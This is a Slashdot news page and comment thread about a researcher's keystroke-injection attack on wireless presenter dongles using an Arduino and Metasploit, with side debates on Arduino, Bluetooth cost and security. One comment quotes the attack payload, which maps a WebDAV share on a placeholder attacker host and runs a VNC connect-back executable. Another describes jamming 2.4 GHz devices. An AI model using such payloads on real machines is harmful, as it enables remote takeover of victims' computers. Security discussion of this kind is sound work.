Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Wireless Presenters Attacked Using an Arduino

Soulskill posted more than 4 years ago | from the watch-out-steve dept.

Hardware Hacking 69

An anonymous reader writes "This week Dutch security researcher Niels Teusink described a method of attacking wireless presenter devices at an Amsterdam security conference. He had a demo showing how it is possible to use an Arduino and Metasploit to get remote code execution by sending arbitrary keystrokes to the presenter dongle. He has now released the code and made a blog post explaining how it all works. Better watch out the next time you're giving a presentation using one of these devices!"

cancel ×

69 comments

Sorry! There are no comments related to the filter you selected.

Microcontroller, not Arduino (0)

Anonymous Coward | more than 4 years ago | (#32791908)

You wouldn't say, "I attacked that system using a Dell" -- you'd say "I attacked that system using a computer"

"Wireless Presenters Attacked using Microcontrollers" is a much better title...

Fanboi-ism pisses me off, and Arduinos are getting almost as bad as Apple products in that sense

Re:Microcontroller, not Arduino (4, Informative)

marcansoft (727665) | more than 4 years ago | (#32791964)

Strictly speaking, Arduinos aren't microcontrollers. They're a popular hobbyist embedded platform based around the Atmel AVR microcontroller family. Much like Dells are a particular brand of computer based around x86 architecture microprocessors.

But yes, "Arduino this", "Arduino that" gets tiring after a while. Arduinos have a huge following, but there are zillions of alternatives of all shapes and sizes (many of them better in many ways). There's nothing Arduino-specific about this hack.

Re:Microcontroller, not Arduino (3, Informative)

iksbob (947407) | more than 4 years ago | (#32792016)

While strictly true (once you attach a microcontroller chip to a PCB board, it's no longer just a microcontroller), there isn't much to an Arduino board aside from the controller. Most include some basic power management and a USB-to-serial chip for programming and comms, but those are just common features rather than requirements to be considered an Arduino. IMO, what defines an Arduino is its software package... Or is that what you were getting at? ^_^

Re:Microcontroller, not Arduino (2, Informative)

marcansoft (727665) | more than 4 years ago | (#32792122)

Well, technically, Arduinos are defined as whatever Smart Projects labels an Arduino (it's their trademark). However, yeah, Arduinos (in common usage) are defined more by their software rather than their hardware(in particular, a compatible bootloader that works with the Arduino development environment), because you don't really need much hardware to make a modern microcontroller run.

Which really just goes on to prove that there isn't anything special about Arduino at all. It's really just a bog-standard simple microcontroller breakout board (power regulator, serial I/O either via RS232 or USB, and pin headers for the micro pins) and a standard bootloader and development environment, using a slightly cooked version of C/C++ for programming (they just pre-include a header and tack on a standard main() before feeding it to GCC). Everything else is just positive feedback: Arduino is popular, so people use Arduino, so there's a large community of projects and examples and prewritten code, so Arduino becomes more popular.

I started off with microcontrollers using a crappy development board for PIC micros quite a few years back, and quickly outgrew it and have never really bothered with dev boards ever since. There isn't much of a point when you literally just feed the micro power and ground and it runs. I've built projects where the number of support components for the micro was literally zero (one, if you count the programming connector).

Re:Microcontroller, not Arduino (2, Interesting)

kaizokuace (1082079) | more than 4 years ago | (#32792996)

there is nothing special with the Arduino when you look at it from a technical standpoint. But it all changes when you look at it from a human stand point. Since the release of the Arduino platform I have seen so many more people that would probably never picked up a soldering iron in their lives make cool stuff. The platform itself inspired many, which is much more important than it being some sort of special hardware.

Re:Microcontroller, not Arduino (2, Informative)

drinkypoo (153816) | more than 4 years ago | (#32792434)

But yes, "Arduino this", "Arduino that" gets tiring after a while. Arduinos have a huge following, but there are zillions of alternatives of all shapes and sizes (many of them better in many ways). There's nothing Arduino-specific about this hack.

What's cool about Arduino is how it reduces development time through the use of readily available shields. So if he used any of them then it's worth mentioning and not if not (I skimmed but did not actually read the article, I didn't notice ANY of the Arduino details, but I did get momentarily flustered about the idea of owning a USBee.)

Speaking of cool stuff I could own, can anyone recommend a cheap USB JTAG with Windows and Linux support? I would accept RS232 as a second option. LPT is not eligible.

Re:Microcontroller, not Arduino (1)

marcansoft (727665) | more than 4 years ago | (#32792476)

No shields, which is why it's rather pointless. He just used the SPI interface pins connected to one of these [digikey.com] . He even had to perform voltage level conversion.

To answer your question, you can just get any bitbanging USB JTAG interface based on the FT2232D or FT2232H chip. I own this one [tincantools.com] , which also happens to include a USB to RS232 converter channel (since the FT2232 has two comm channels). FT2232D versions are more common but are only USB full-speed. FT2232H versions can bitbang faster, as they USB High-Speed peripherals. You can use these with OpenOCD, which should work on Windows and Linux (and OSX and other OSes).

Re:Microcontroller, not Arduino (1)

drinkypoo (153816) | more than 4 years ago | (#32792602)

Yeah, I'll just buy that one when the time comes. Right now I'm "sitting at" this Gateway LT3201u 11" 'netbook' which has a chipset which will work with coreboot v2. So I'm thinking that I'm going to need to give it some love because Gateway refuses to kick out a BIOS which will enable AMD-V. Besides, the BIOS POST is a huge part of the boot time. Die, Gateway, Die.

Re:Microcontroller, not Arduino (0)

Anonymous Coward | more than 4 years ago | (#32794136)

The, Gateway, The? But that makes no sense!

Re:Microcontroller, not Arduino (0)

Anonymous Coward | more than 4 years ago | (#32793052)

While we're being pedantic; a "wireless presenter" is not a gadget, it's a man in a dinner jacket and no trousers reading the news in received pronunciation. God Save the Queen!

Re:Microcontroller, not Arduino (1)

gyrogeerloose (849181) | more than 4 years ago | (#32792008)

You wouldn't say, "I attacked that system using a Dell" -- you'd say "I attacked that system using a computer"

You may be right, but if you'd actually read TFA, you would know that an Arduino was used in the exploit. But, hey, never let the facts get in the way of a good rant.

Re:Microcontroller, not Arduino (1)

cduffy (652) | more than 4 years ago | (#32799714)

You wouldn't say, "I attacked that system using a Dell" -- you'd say "I attacked that system using a computer"

You may be right, but if you'd actually read TFA, you would know that an Arduino was used in the exploit.

He isn't denying that an Arduino was used -- but rather that it's relevant data. You might read the text you're quoting for intended meaning, perhaps?

Re:Microcontroller, not Arduino (1)

Mr. Freeman (933986) | more than 4 years ago | (#32797708)

"You wouldn't say, "I attacked that system using a Dell""

You would if you used a Dell computer. This guy DID use an Arduino, so it isn't incorrect or "fanboy-ish" to say "Arduino".

There's also a second issue here. If you say "I used a computer to do such and such" then it's understood that you were using any hardware running windows, apple, or linux operating systems. There's really only three options. Not so with microcontrollers. There's hundreds of microcontrollers and they're all significantly different from one to another and attempting to replicate the results on a different microcontroller requires a fair bit of work. It's extremely helpful to say "I did this with an Arduino" or "I did this with a PIC model number XYZ", etc.

Re:Microcontroller, not Arduino (1)

cduffy (652) | more than 4 years ago | (#32799752)

You would if you used a Dell computer.

Only if I were using some capability unavailable on non-Dell computers. Otherwise, why bother to call them out?

There's hundreds of microcontrollers and they're all significantly different from one to another and attempting to replicate the results on a different microcontroller requires a fair bit of work.

That matters a great deal if you're sharing your implementation with anyone who might want to reproduce your results. On the other hand, if you're not sharing your implementation with anyone, and there's nothing that makes it conceptually tied to the same platform, why consider the platform of choice a pertinent enough detail to put it in the summary?

Huh huh huh (2, Funny)

Anonymous Coward | more than 4 years ago | (#32791910)

You said "dongle".

hmmm.... (5, Funny)

girlintraining (1395911) | more than 4 years ago | (#32791930)

Useful for:

* Corporate espionage
* Screwing with professors at school
* Pissing off Steve Jobs.

We all know which one's most likely.

Re:hmmm.... (1)

N!k0N (883435) | more than 4 years ago | (#32791950)

Definitely screwing w/ professors...

Re:hmmm.... (1)

yincrash (854885) | more than 4 years ago | (#32792056)

well, because the devices send any keyboard command, you can take over the machine and do anything. however, if you just want to wreck havoc with powerpoint, then you could probably just bring your own keyboard presenter and it will probably work the same way. like someone using a remote control on your tv

Re:hmmm.... (1)

Kemanorel (127835) | more than 4 years ago | (#32792394)

Most presenting devices have at least rudimentary pairing between remote and dongle. At least I know that the Keyspan remote I've been using for the last 5 or more years works that way. Just bringing another remote of the same kind would likely do nothing.

Re:hmmm.... (1)

dkf (304284) | more than 4 years ago | (#32794296)

Most presenting devices have at least rudimentary pairing between remote and dongle.

Yes, but a lot of projectors also have remote controls, and they're usually not paired. Switching things off mid-presentation is deeply annoying to the presenter.

(I say this because of a presentation I once saw a friend do where his remote would (IIRC) bring up the configuration menu every time he switched page. Funny, but it forced him to switch to manual control.)

Re:hmmm.... (4, Funny)

Dragoniz3r (992309) | more than 4 years ago | (#32792338)

I guess we all know what Gizmodo will be doing at the next major conference.

Re:hmmm.... (2, Funny)

antifoidulus (807088) | more than 4 years ago | (#32792620)

Wait, you mean Apple's newest product ISNT "iGoatse"? Damn, and here I had my credit card out ready to go.

Re:hmmm.... (1)

noidentity (188756) | more than 4 years ago | (#32793636)

Nice try, but Steve Jobs doesn't need any remote controls for his presentations. He has a special receiver that he communicates with via his RDF.

Hacking (0, Flamebait)

JustNiz (692889) | more than 4 years ago | (#32791978)

There comes a point at which some exploits are so lame that the term hacking shouldn't be used. The most you could hope to achieve with this 'exploit' is to just be a bloody nuisance.

Re:Hacking (3, Informative)

Anonymous Coward | more than 4 years ago | (#32792010)

Did you rta? He demoed getting a Metasploit payload on the system

Re:Hacking (0)

Anonymous Coward | more than 4 years ago | (#32793264)

Hacking involves creating the hack, and all specifics of the exploit yourself.

Copying code off Metasploit and dropping it on an arduino is akin to an IRC script kiddy copypastaing a script and using it to spam the living fuck out of the inhabitants.

congratulations, you made rank of script kiddy.

Re:Hacking (1)

Procasinator (1173621) | more than 4 years ago | (#32808596)

By your BS definition.

That's like saying cooking is only cooking when you produce all ingredients from the seed, etc.

Re:Hacking (1)

dandart (1274360) | more than 4 years ago | (#32792038)

No, should be cracking more than anything.

Better attack (3, Funny)

FooAtWFU (699187) | more than 4 years ago | (#32792044)

You could implement a better attack by just throwing Arduinos at the presenter.

Re:Better attack (1)

pjt33 (739471) | more than 4 years ago | (#32793874)

I read the headline and thought that was what it was about.

Re:Better attack (2, Informative)

L4t3r4lu5 (1216702) | more than 4 years ago | (#32797222)

The user is always the weakest link in any secure system.

RTFA? (4, Informative)

WD (96061) | more than 4 years ago | (#32792132)

It's clear that you and the moderators haven't bothered to actually read the article. The research and tools used for the attack were non-trivial, and the impact is remote code execution.

Re:RTFA? (1, Informative)

Anonymous Coward | more than 4 years ago | (#32792344)

Here's the super leet exploit from the article:

# [Win+R]
# net use X: http://attacker/webdavshare
# X:\VNCconnectback.exe
# [enter]

Attacker does this by sending keycode signals over RF, pretending to be the presenter's wireless remote. The hard part was reverse engineering presenter commands (he finds that replaying them works), and sniffing through channels to find the channel the presenter is using.

I'm in full agreement with the GP.

Re:RTFA? (1)

Procasinator (1173621) | more than 4 years ago | (#32808628)

And how is this lame, or only a nuisance?

The attacker can get full control over the remote computer.

The exploit code is the least significant part of this. Any exploit code could be used. If the user needed to escalate privileges for instance then another vulnerability might be attacked. But who cares: the point is the presenter is vulnerable, and critically so. What has leet code got do with anything?

Harmless (0)

dandart (1274360) | more than 4 years ago | (#32791982)

"LULZ OWNED" is all we'd see, and we'd laugh, and life would go on.

Re:Harmless (2, Informative)

N!k0N (883435) | more than 4 years ago | (#32791992)

dunno about that -- from the article (yes, i RTFA in this case) it seems you can send any keystrokes you want... so as long as the system accepted the commands you were giving it (presumably anything that doesn't require user elevation) you could make it do whatever you wanted.

Re:Harmless (1)

dandart (1274360) | more than 4 years ago | (#32792046)

Yeah, but who would? They're just bored kids.

Re:Harmless (0)

Anonymous Coward | more than 4 years ago | (#32792138)

You have no imagination. Get someone from a prospective supplier to hold a presentation of their offering at your company (or theirs), backdoor their computer through the wireless presenter and have a look around to see what their price limits are and if they're hiding flaws from you. Heck, you could do this from the parking lot when they're presenting something to their bosses.

IMHO wireless interfaces are a no-go in any corporate environment.

Re:Harmless (1)

Sulphur (1548251) | more than 4 years ago | (#32793058)

Arduiwenie found murdered in back alley.

--

Preparing to delete all files. Press any key to continue.

Re:Harmless (0)

Anonymous Coward | more than 4 years ago | (#32792160)

Right, if you were protected by using a standard user account and were also using something like applocker to prevent code that isn't whitelisted from running they wouldn't be able to do much. Perhaps they could delete the user's files. But not much else.

Re:Harmless (1)

Codename Dutchess (1782238) | more than 4 years ago | (#32792126)

Arduinowned!

This is why standard protocols help (5, Insightful)

Anonymous Coward | more than 4 years ago | (#32792006)

While Bluetooth certainly has its issues and took a while to address all the early security concerns, I really wish wireless device creators would stop rolling their own protocols. With limited engineering, they are almost certainly guaranteed to do it badly. As of Bluetooth 2.1, all communication aside from service discovery is encrypted. There are still pairing exploits and implementation defects, but at least they have the core idea right. In order to monkey with a Bluetooth presentation remote, you would have to (a) discover the shared key during the speakers presentation, (b) convince the presenter to redo pairing prior to speaking and somehow get them to pair with your evil device instead (has a Bluetooth man-in-the-middle attack been tried yet?), or (c) give up and settle for just jamming the communication, causing a whopping 30 seconds of confusion. If you design a wireless protocol now without over-the-air encryption, you are doing it wrong.

Re:This is why standard protocols help (4, Insightful)

mc6809e (214243) | more than 4 years ago | (#32792112)

While Bluetooth certainly has its issues and took a while to address all the early security concerns, I really wish wireless device creators would stop rolling their own protocols.

Yeah, but then the maker would have to licence the technology and that adds cost. The chip used in the device doesn't come with Bluetooth. It's a very simple chip.

I suspect that the problem here is that the engineer just didn't think about security.

Re:This is why standard protocols help (2, Informative)

rawler (1005089) | more than 4 years ago | (#32792248)

AFAIK, Bluetooth is License-free. That is, the protocol, and all related specifications are free for implementation.

Of course you may still need to pay a little for a chip that implements it, but the same thing goes for any wireless chip, and I doubt Bluetooth is THAT much more expensive?

Re:This is why standard protocols help (4, Informative)

DeadCatX2 (950953) | more than 4 years ago | (#32792330)

Whereas your average Arduino board is about $20-30 or so, an Arduino board with Bluetooth costs about $150.

http://www.sparkfun.com/commerce/tutorial_info.php?tutorials_id=148 [sparkfun.com]

Yes, Bluetooth is that expensive. The ArduinoBT board uses an off-the-shelf BlueGiga WT11. Newark sells those for about $60.

http://www.newark.com/bluegiga/wt11-a-ai/class-1-bluetooth-2-0-edr-module/dp/15P4005 [newark.com]

Mind you, this is a Class 1 (i.e. long range) transmitter, using BT 2.0 and not BT 2.1. Compare this to a standard RF transmitter and receiver, which is a couple bucks per chip...

Re:This is why standard protocols help (2, Informative)

flux (5274) | more than 4 years ago | (#32792504)

Hello? You can buy Bluetooth-USB-modules for as little as $3 from Amazon. And that is the price for a single item sold to a consumer. The prices of development-kit-level items is hardly comparable to the actual price to implement Bluetooth in a mass-produced gizmo.

I wonder how come you didn't find that the 433MHz wireless modems cost $40 at Sparkfun as well..

I believe a large reason, if not the largest, for not using Bluetooth in simple wireless gadgets is the amount of electricity it takes compared to a simpler custom-protocol device on the 433MHz band.

Re:This is why standard protocols help (3, Informative)

DeadCatX2 (950953) | more than 4 years ago | (#32792686)

Do you mean the Bluetooth USB modules used to add Bluetooth support to a PC that doesn't have it? Unfortunately, an embedded system doesn't have a desktop-class processor to run the Bluetooth stack.

Oh, and those el-cheap-o Bluetooth modules you're suggesting are probably very out-dated, which is why they're so cheap. That $3 module probably cost more when it was less than a year old and they weren't trying to dump the inventory that they can't sell at a higher price...

Re:This is why standard protocols help (1)

dkf (304284) | more than 4 years ago | (#32794318)

Oh, and those el-cheap-o Bluetooth modules you're suggesting are probably very out-dated, which is why they're so cheap. That $3 module probably cost more when it was less than a year old and they weren't trying to dump the inventory that they can't sell at a higher price...

But for keyboard simulation, you don't need a fancy high-speed module. You're talking a few bytes per second. A cheap module should be enough. Hardware that can do anything is more expensive than hardware which is more specialized to its task; flexibility costs.

Re:This is why standard protocols help (1)

mrmeval (662166) | more than 4 years ago | (#32797788)

The Arduino has 16k of flash memory and 2k of ram. It has exactly one hardware uart though other pins can act as software serial devices. It cannot act as a USB master like a PC without some help though it can act as a USB peripheral i.e. a usb to serial device. I may be able to hack apart that bluetooth dongle and get access to the bluetooth chip but I suspect the USB and bluetooth are integrated in one ASIC which won't allow that.

Re:This is why standard protocols help (1)

adolf (21054) | more than 4 years ago | (#32802164)

Ah, yes. The old "it cost more, therefore it must be better/newer/faster" generalization.

So, go have a look [google.com] at what's actually available. You'll see that while the prices do vary wildly, there is very little variation in terms of the actual products (aside from packaging) other than a handful of products that appear to actually be independently engineered (which is not necessarily a good thing).

Just to pick one particular product: B&H sells it [bhphotovideo.com] for $11.95. Computer Geeks has the same one [geeks.com] for $7.99. Our hack-friendly friends at Sparkfun sell their copy [sparkfun.com] for $10.99.

Meanwhile, buy.com has the same thing [buy.com] for $3.37 plus shipping. Deal Extreme is even cheaper [dealextreme.com] at $1.85 including shipping, but you have to wait for it to cross the Pacific.

So...uh. Should I buy the expensive one from B&H, or the cheap one from Deal Extreme? B&H will certainly handle returns better in case the thing breaks or whatever, but for the price I can buy a small handful of these widgets from DX and spread out the MTBF myself.

(The rest of your post is spot-on.)

Re:This is why standard protocols help (2, Informative)

drinkypoo (153816) | more than 4 years ago | (#32792464)

Yeah, but then the maker would have to licence the technology and that adds cost. The chip used in the device doesn't come with Bluetooth. It's a very simple chip.

If there is demand, Wal-Mart will be happy to sell an unlicensed Bluetooth transmitter like the ones you can buy from DealExtreme, except in some packaging more elaborate than that usually used for crack rocks (i.e. a tiny ziploc.) That will help keep the costs down. :)

Of course, if all us nerds just tell all our non-nerd friends to stop buying the non-Bluetooth versions because they're broadcasting their passwords to the world, then a percentage of them will listen, and we can help stick a nail in the coffin of the various nonstandard devices. As much as I hate to see a proprietary, and possibly expensively licensed (who can say? it's not like they publish a fee schedule) protocol pushed all over everything, Bluetooth is the best thing around today.

Re:This is why standard protocols help (1)

aztektum (170569) | more than 4 years ago | (#32792572)

I suspect that the problem here is that the bean counters didn't care about security.

That's usually been my experience.

Re:This is why standard protocols help (1)

g253 (855070) | more than 4 years ago | (#32833786)

Or the engineer did think about security, but the managers & accountants said no ;-)

Re:This is why standard protocols help (0)

Anonymous Coward | more than 4 years ago | (#32792150)

Bluetooth is expensive. Adding even $1 to the cost of one of these things significantly effects its price and profitability. I'm not saying it's a bad idea, but there's definitely a market for these cheaper ones.

dom

Re:This is why standard protocols help (1)

kangsterizer (1698322) | more than 4 years ago | (#32792276)

Most of these devices don't use frequency hopping (FHSS) or even DSSS or any kind of interference resistance algorithm. Also, they run on 2.4ghz band because it's license free.
All you need is a dumb laptop running Linux, or even any other OS, with a wifi card.
All you have to do is set the card into raw mode (on Linux, usually setting monitor mode) to be able to inject packet.
Once done, inject packets as fast as you can on the same frequency. The packet contents doesn't matter at all. And done, jammed.

Works well against my Logitech G7, my Spektrum DX7 and a few other 2.4ghz "stupid" devices.

Of course, that's a DoS, and it's dumb, no exploits here. But the point is Bluetooth resists it. Still, I've a feeling such DoS will get more widespread, especially during demos. Jamming everyone's wifi with your own card is harder but possible, especially if you got a powerfull card, say 1W and others are running at 100mW tops.

Re:This is why standard protocols help (1)

AaronLawrence (600990) | more than 4 years ago | (#32798418)

Bluetooth is very complicated compared to other options, which content themselves basically with providing a serial port. This complexity and licensing costs add significantly to devices.

Heaven forbid... (1)

Trip6 (1184883) | more than 4 years ago | (#32792074)

...the presenters can't advance their PowerPoint slides...

Re:Heaven forbid... (0)

Anonymous Coward | more than 4 years ago | (#32792374)

If the audience is paying to be there, then yes, forbid it.

TV / VCR Remote in class (0)

Anonymous Coward | more than 4 years ago | (#32792098)

This reminds me of the 80s where kids would take a remote control from home and when the teacher was showing some instructional video tape, change the channel on the TV or mute it, with said teacher trying to figure out what was wrong.

You bring a 'compatible' remote, you control the device the receiver is attached to. End of story.

Re:TV / VCR Remote in class (0)

Anonymous Coward | more than 4 years ago | (#32792164)

(See TV-b-gone for the modern version of the remote hack)

One interesting aspect about the presenter hack is that the device itself just sends a few selected keystrokes (the ones used to control presentations, i.e. page-up, page-down, etc.), but the receiver will actually accept all keys, not just the ones on the remote. If this were just about messing with someone's presentation, it would be embarrassing but harmless. With full keyboard functionality you can be much more malicious: Open a console window, dump a script, clean up, all in a split second: Computers can type very fast...

Re:TV / VCR Remote in class (3, Insightful)

fuzzyfuzzyfungus (1223518) | more than 4 years ago | (#32792336)

In many of these cases the little proprietary receiver dongle accepts arbitrary keystrokes, not just the ones that the remote has buttons for, because it is exactly the same item as the one being sold(under that brand, or one or more others) in a package with a wireless keyboard and often a mouse as well. Some kits come with everything in one box, receiver, keyboard, mouse, little powerpoint clicker widget.

In other cases, I imagine, the engineer in charge of knocking together the receiver unit (correctly) realized that implementing a general-purpose system for taking arbitrary keycodes encapsulated in whatever the proprietary RF protocol is and dumping them to the host system just like any USB HID device wouldn't be much harder than implementing just the 6 keycodes found on revision 1 of Product X and would save him from having to do it again when revision 1.1 adds another couple of buttons, and revision 2.0 has to have a special button for the ribbon interface, or whatever it happens to be.

Re:TV / VCR Remote in class (0)

Anonymous Coward | more than 4 years ago | (#32792722)

From an engineer's point of view, it's an obvious choice. It will still catch a lot of people off guard. But of course so will the complete lack of encryption. Good job, Logitech. $100 for a what amounts to little more than a TV remote.

Re:TV / VCR Remote in class (1)

fuzzyfuzzyfungus (1223518) | more than 4 years ago | (#32795198)

The one really annoying thing, with some of the especially cheap-seats implementations, is that the RF protocol is so insecure that multiple units from the same manufacturer in moderate proximity(within a couple rooms of each other) will start accidentally dropping input into the wrong receiver from time to time. One second, you are fine. The next moment, something goes wrong and you are having sentences from the email the guy two doors down is writing dumped into your presentation.

Until somebody puts together a kit, on the difficultly level of the TV-B-Gone, the security implications really aren't that exciting, for the sorts of environments that allow you to plug random wireless USB shit into their computers, compared to the risks posed by other common threats(once every malicious kid and disgruntled employee with 30 bucks can press a "drop prebuilt 'all kinds of mixed nasties' payload" button and hit every system with an active receiver within 100 meters, things get more exciting). The fact that some of these things can't even tolerate multiple users in the same wing of a building, though, is both pathetic and inconvenient.

In summary (1)

damn_registrars (1103043) | more than 4 years ago | (#32792192)

The blog entry commented especially that the hack is possible in part because the wireless devices use a one-size-fits-all protocol; hence the presentation remotes are capable of communicating keyboard and mouse commands even though they are really neither a keyboard nor a mouse.

In other words, our desire for things cheap and shiny has made us vulnerable yet again. Its the lead-paint-on-toys problem, but this time the victims are not children.

Re:In summary (2, Insightful)

fuzzyfuzzyfungus (1223518) | more than 4 years ago | (#32792354)

I would agree that the desire for "cheap" is arguably behind this problem; but I would disagree about "shiny". The problem isn't that the protocol is general purpose(particularly in those cases where the receiver was sold in a set that contained a mouse and/or keyboard in addition to the little PPT remote...) but that absolutely no useful effort was made to apply what we already know about authentication and encryption. For just slightly more, you could just have a bluetooth device that(while certainly not free of security issues throughout its history) at least takes security into account, and isn't some poor bastard who knows very little about crypto reinventing the wheel at the last second.

Re:In summary (1)

Vellmont (569020) | more than 4 years ago | (#32793524)


In other words, our desire for things cheap and shiny has made us vulnerable yet again. Its the lead-paint-on-toys problem, but this time the victims are not children.

Who are the victims? People giving presentations? And they're victims to people being jackasses?

Sorry, I just don't see that as comparable to children (or anyone) being poisoned by lead. Security is always about risk. There's a million ways to be a dumb ass during a presentation, be it the tv b gone [wikipedia.org] or something about equally as childish but low-tech as a whoopee cushion.

The exploit is interesting, and a good hack. It's not particularly a large problem that ranks up their as one of the security problems of our times however. For the amount of work required to build one of these things and the minor amount of annoyance possible from it, I find it hard to blame the designers for not making this more secure.

Re:In summary (1)

moortak (1273582) | more than 4 years ago | (#32795700)

If it just allowed minor presentation interrupting issues it wouldn't even be all that notable of an event. The catch is that it allows remote code execution. That is a little bigger than a whoopee cushion.

If Arduinos are outlawed (1)

nurb432 (527695) | more than 4 years ago | (#32793802)

Then only outlaws.. or something like that..

Real men use ARM microcontrollers (1)

KickAssTunes (248643) | more than 4 years ago | (#32796038)

Yeah, no big deal that some one used an AVR or PIC microcontroller to do something.

You need to put away your toys and be a man by stepping up to an ARM microcontroller.

Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>